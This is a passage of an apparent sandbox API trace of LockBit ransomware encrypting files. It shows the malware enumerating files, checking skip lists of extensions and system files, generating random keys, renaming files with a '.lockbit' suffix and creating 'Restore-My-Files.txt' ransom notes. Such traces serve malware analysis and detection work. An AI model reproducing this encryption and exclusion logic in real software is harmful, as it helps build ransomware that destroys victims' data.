lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.546] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0109.546] ReadFile (in: hFile=0x3bc, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0109.552] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0109.552] malloc (_Size=0xa6) returned 0x77d800 [0109.552] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0109.553] free (_Block=0x77d800) [0109.553] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0109.553] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0109.553] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0109.553] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbb7ffa00, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x51aadd90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbb7ffa00, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x68c, dwReserved0=0x0, dwReserved1=0x0, cFileName="BS00443_.WMF", cAlternateFileName="")) returned 1 [0109.553] lstrcmpiW (lpString1=".", lpString2="BS00443_.WMF") returned -1 [0109.553] lstrcmpiW (lpString1="..", lpString2="BS00443_.WMF") returned -1 [0109.553] PathFindExtensionW (pszPath="BS00443_.WMF") returned=".WMF" [0109.553] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0109.553] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0109.553] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0109.553] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0109.553] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0109.553] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0109.553] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0109.553] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0109.554] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0109.554] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0109.554] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0109.554] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0109.554] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0109.554] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0109.554] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0109.554] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0109.554] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0109.554] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0109.554] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0109.556] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0109.556] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0109.556] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0109.556] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0109.556] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0109.556] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.556] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0109.556] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0109.556] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0109.556] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0109.556] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0109.556] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0109.556] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0109.556] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0109.556] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0109.556] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0109.556] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0109.556] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0109.557] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0109.557] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0109.557] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0109.557] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0109.557] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0109.557] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.557] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0109.557] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0109.557] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0109.557] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0109.557] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BS00443_.WMF") returned 1 [0109.557] lstrcmpiW (lpString1="ntldr", lpString2="BS00443_.WMF") returned 1 [0109.557] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BS00443_.WMF") returned 1 [0109.557] lstrcmpiW (lpString1="bootsect.bak", lpString2="BS00443_.WMF") returned -1 [0109.558] lstrcmpiW (lpString1="autorun.inf", lpString2="BS00443_.WMF") returned -1 [0109.558] lstrcmpiW (lpString1="thumbs.db", lpString2="BS00443_.WMF") returned 1 [0109.558] lstrcmpiW (lpString1="iconcache.db", lpString2="BS00443_.WMF") returned 1 [0109.558] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0109.558] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF") returned=".WMF" [0109.558] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0109.558] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0109.558] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0109.558] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0109.558] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0109.558] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0109.558] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0109.558] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0109.558] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0109.558] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0109.558] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0109.559] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0109.559] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0109.559] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0109.559] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0109.559] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0109.559] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0109.559] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0109.559] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0109.559] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0109.559] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0109.559] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0109.559] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0109.559] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0109.559] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0109.559] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0109.560] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0109.560] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0109.560] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF.lockbit") returned 72 [0109.560] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00443_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0109.560] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0109.560] malloc (_Size=0x40068) returned 0x3db00b8 [0109.562] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x3db00d0 | out: lpFileSize=0x3db00d0*=1676) returned 1 [0109.562] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.562] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.562] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df00ec, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df00ec) returned 0x0 [0109.562] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.562] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.562] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df00fc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df00fc) returned 0x0 [0109.563] ReadFile (in: hFile=0x3ac, lpBuffer=0x3db00ec, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8) returned 0x0 [0109.576] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0109.576] malloc (_Size=0xa6) returned 0x77d800 [0109.576] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0109.577] free (_Block=0x77d800) [0109.577] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0109.577] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0109.577] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0109.577] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22a6aa00, ftCreationTime.dwHighDateTime=0x1bd4af6, ftLastAccessTime.dwLowDateTime=0x600aeb50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x22a6aa00, ftLastWriteTime.dwHighDateTime=0x1bd4af6, nFileSizeHigh=0x0, nFileSizeLow=0xf38, dwReserved0=0x0, dwReserved1=0x0, cFileName="BS00444_.WMF", cAlternateFileName="")) returned 1 [0109.577] lstrcmpiW (lpString1=".", lpString2="BS00444_.WMF") returned -1 [0109.577] lstrcmpiW (lpString1="..", lpString2="BS00444_.WMF") returned -1 [0109.577] PathFindExtensionW (pszPath="BS00444_.WMF") returned=".WMF" [0109.577] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0109.577] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0109.577] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0109.577] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0109.577] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0109.577] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0109.577] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0109.577] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0109.577] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0109.577] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0109.577] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0109.578] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0109.578] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0109.578] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0109.578] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0109.578] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0109.578] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0109.578] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0109.578] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0109.578] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0109.578] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0109.578] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0109.578] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0109.578] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0109.578] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.578] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0109.578] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0109.578] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0109.578] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0109.578] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0109.578] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0109.578] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0109.578] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0109.578] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0109.579] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0109.579] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0109.579] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0109.579] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0109.579] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0109.579] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0109.579] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0109.579] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0109.579] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.579] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0109.579] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0109.579] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0109.579] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0109.579] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BS00444_.WMF") returned 1 [0109.579] lstrcmpiW (lpString1="ntldr", lpString2="BS00444_.WMF") returned 1 [0109.579] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BS00444_.WMF") returned 1 [0109.579] lstrcmpiW (lpString1="bootsect.bak", lpString2="BS00444_.WMF") returned -1 [0109.579] lstrcmpiW (lpString1="autorun.inf", lpString2="BS00444_.WMF") returned -1 [0109.579] lstrcmpiW (lpString1="thumbs.db", lpString2="BS00444_.WMF") returned 1 [0109.579] lstrcmpiW (lpString1="iconcache.db", lpString2="BS00444_.WMF") returned 1 [0109.579] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0109.580] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF") returned=".WMF" [0109.580] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0109.580] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0109.580] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0109.580] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0109.580] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0109.580] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0109.580] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0109.580] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0109.580] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0109.580] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0109.580] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0109.580] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0109.580] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0109.581] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0109.581] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0109.581] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0109.581] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0109.581] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0109.581] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0109.581] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0109.581] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0109.581] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0109.581] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0109.581] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0109.581] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0109.581] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0109.581] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0109.581] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0109.581] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF.lockbit") returned 72 [0109.581] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00444_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0109.588] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0109.588] malloc (_Size=0x40068) returned 0x1ff1e60 [0109.588] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3896) returned 1 [0109.588] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.589] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.589] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0109.589] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.589] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.589] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0109.589] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.600] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0109.600] malloc (_Size=0xa6) returned 0x77d800 [0109.600] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0109.601] free (_Block=0x77d800) [0109.601] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0109.601] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0109.601] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0109.601] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21757d00, ftCreationTime.dwHighDateTime=0x1bd4af6, ftLastAccessTime.dwLowDateTime=0x600aeb50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x21757d00, ftLastWriteTime.dwHighDateTime=0x1bd4af6, nFileSizeHigh=0x0, nFileSizeLow=0xed4, dwReserved0=0x0, dwReserved1=0x0, cFileName="BS00445_.WMF", cAlternateFileName="")) returned 1 [0109.601] lstrcmpiW (lpString1=".", lpString2="BS00445_.WMF") returned -1 [0109.601] lstrcmpiW (lpString1="..", lpString2="BS00445_.WMF") returned -1 [0109.601] PathFindExtensionW (pszPath="BS00445_.WMF") returned=".WMF" [0109.601] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0109.601] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0109.601] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0109.601] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0109.601] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0109.601] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0109.602] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0109.602] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0109.602] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0109.602] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0109.602] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0109.602] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0109.602] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0109.602] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0109.602] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0109.602] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0109.602] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0109.602] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0109.602] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0109.602] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0109.602] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0109.602] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0109.602] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0109.602] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0109.602] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.602] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0109.602] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0109.603] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0109.603] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0109.603] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0109.603] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0109.603] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0109.603] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0109.603] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0109.603] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0109.603] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0109.603] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0109.603] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0109.603] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0109.603] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0109.603] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0109.603] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0109.603] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.603] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0109.603] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0109.603] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0109.603] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0109.604] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BS00445_.WMF") returned 1 [0109.604] lstrcmpiW (lpString1="ntldr", lpString2="BS00445_.WMF") returned 1 [0109.604] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BS00445_.WMF") returned 1 [0109.604] lstrcmpiW (lpString1="bootsect.bak", 